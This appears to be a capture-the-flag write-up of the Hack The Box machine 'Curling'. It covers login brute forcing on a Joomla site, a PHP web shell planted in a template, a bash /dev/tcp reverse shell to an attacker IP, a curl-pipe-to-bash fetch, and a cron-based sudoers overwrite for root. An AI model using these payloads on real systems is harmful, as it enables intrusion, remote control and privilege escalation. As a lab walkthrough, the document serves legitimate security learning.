---
title: "HTB - Curling"
showdate: True
Date: "2021-04-22"
tags: ["Writeups"]
---
# Curling

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled.png](/writeups/Curling/Untitled.png)

## Nmap

First, we run a full port scan on the target.

```bash
> nmap -p- -T5 10.129.139.144
```

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%201.png](/writeups/Curling/Untitled%201.png)

Then we run a targeted scan with default scripts and version detection enabled.

```bash
> sudo nmap -p 22,80 -sV -sC 10.129.139.144
```

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%202.png](/writeups/Curling/Untitled%202.png)

## HTTP Enumeration

When we visit the home page, we are presented with what looks like a blog and a login form. The posts was written by Super User.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%203.png](/writeups/Curling/Untitled%203.png)

We are able to find an interesting comment at the end of the home page source code which contains a string that can be base64 decoded.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%204.png](/writeups/Curling/Untitled%204.png)

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%205.png](/writeups/Curling/Untitled%205.png)

**secret.txt:** Q3VybGluZzIwMTgh

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%206.png](/writeups/Curling/Untitled%206.png)

**secret.txt base64 decoded:** Curling2018!

We are able to find the web application is running Joomla Version 3.8.8 but there isn't any interesting information in the files or sub-directories or know exploits.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%207.png](/writeups/Curling/Untitled%207.png)

We can find the administrator section of the application and start a dictionary attack on the login page.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%208.png](/writeups/Curling/Untitled%208.png)

Let collect a word list from the homepage using cewl tool. The below command generates a word list from the homepage with a minimum work length of 4.

```bash
> cewl -m 4 -w cewl.txt http://10.129.139.42
```

We can use Burp Suite to intercept a request when trying to log in and then send it to intruder feature. We cleared the payload markers and only set a payload marker on the username. We are using the decoded secret string we found as the password.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%209.png](/writeups/Curling/Untitled%209.png)

After checking the payload time to runtime and uploading cewl.txt file, we started the attack and found then the status code and length of the requested change which could indicate a successful login attempt.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2010.png](/writeups/Curling/Untitled%2010.png)

We check the username Floris and password Curling2018! and we got a successful login
We could have used wfuzz instead which could have run a lot faster

```bash
> wfuzz -w ~/Desktop/HTB/machines/easy/curling/cewl.txt -d 'username=FUZZ&passwd=Curling2018!&option=com_login&task=login&return=aW5kZXgucGhw&5ebe0ed6685a39cd102c025ff9255ccb=1' -b 'c0548020854924e0aecd05ed9f5b672b=m0l3vrvsoof9qdq2s1vnhqaurd; 99fb082d992a92668ce87e5540bd20fa=trbkddnniboqhtp6ph964qgpot' http://10.129.139.144/administrator/index.php
```

We see that there is a templates section in the admin panel and we can there is a templates section. Since we are able to modify the template files, this application is vulnerable to remote code execution and we can execute system commands by adding a PHP web shell script.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2011.png](/writeups/Curling/Untitled%2011.png)

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2012.png](/writeups/Curling/Untitled%2012.png)

We added a simple web shell to the index.php page what allows us to execute system commands.

```php
<?php echo shell_exec($_GET['cmd']); ?>
```

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2013.png](/writeups/Curling/Untitled%2013.png)

We can now create a reverse shell to get remote access with www-data permissions.

reverse-shell.sh:

```bash
bash -i >& /dev/tcp/10.10.17.103/8080 0>&1
```

After running the following URL with python http.server to request the reverse shell file, we get a reverse shell.

```bash
http://10.129.139.144/?cmd=curl 10.10.17.103:8000/reverse-shell.sh | bash
```

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2014.png](/writeups/Curling/Untitled%2014.png)

## Privilege Escalation

After unsuccessfully logging into user floris with the decode secrets text, we can find a password_backup file that contains a hex dump.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2015.png](/writeups/Curling/Untitled%2015.png)

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2016.png](/writeups/Curling/Untitled%2016.png)

We can find how to revert this hex dump, check the file type, and run a series of decompressions and and archiving a file. 

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2017.png](/writeups/Curling/Untitled%2017.png)

**password.txt:** 5d<wdCbdZu)|hChXll

We can successful login to floris user with the contents in password.txt.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2018.png](/writeups/Curling/Untitled%2018.png)

### Finding PE Attack Vector

After switching to the floris account, we are able to login and find two files owned by root and that get updated every so often.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2019.png](/writeups/Curling/Untitled%2019.png)

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2020.png](/writeups/Curling/Untitled%2020.png)

We can check the root cron jobs by changes the URL parameter to read the "var/spool/cron/crontabs/root" and reading the report file after the file updates and see there is in fact two cron jobs running under the root user.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2021.png](/writeups/Curling/Untitled%2021.png)

We will replace the sudoers file to allow add floris user to run all commands with no password required. First, we have to create a sudoers file in attacking machine.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2022.png](/writeups/Curling/Untitled%2022.png)

We need to modify the input file to make a request for the sudoers file from the attacker's machine.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2023.png](/writeups/Curling/Untitled%2023.png)

After the sudoers file is transferred from the attacker's machine, we can log in as root.

![Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2024.png](/writeups/Curling/Untitled%2024.png)